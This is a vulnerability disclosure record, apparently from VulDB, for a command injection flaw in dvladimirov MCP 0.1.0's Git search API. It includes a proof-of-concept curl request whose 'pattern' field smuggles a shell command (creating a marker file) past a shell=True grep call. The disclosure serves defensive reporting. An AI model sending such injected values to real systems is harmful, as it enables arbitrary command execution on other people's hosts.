Submission #802083: dvladimirov mcp 0.1.0 Command Injection

Information

Title: dvladimirov mcp 0.1.0 Command Injection
Description: The Git search API accepts a caller-controlled pattern string and passes it into a shell command built with Python f-string interpolation. Because the command is executed with shell=True, shell metacharacters in pattern break out of the intended grep invocation and execute arbitrary host commands.

curl -s -X POST 'http://HOST:PORT/v1/models/git-analyzer/search' \
  -H 'Content-Type: application/json' \
  -d '{ "repo_url": "https://github.com/octocat/Hello-World.git", "pattern": "\"; touch /tmp/dvladimirov_mcp_cmdi; #" }'
Source: ⚠️ https://github.com/dvladimirov/MCP/issues/2
User: SmallW (UID 97245)
Submission: 10/04/2026 02:57 PM (2 months ago)
Moderation: 27/04/2026 05:01 PM (17 days later)
Status: Accepted
VulDB Entry: 359807 [dvladimirov MCP up to 0.1.0 Git Search API mcp_server.py GitSearchRequest repo_url/pattern privilege escalation]
Points: 20
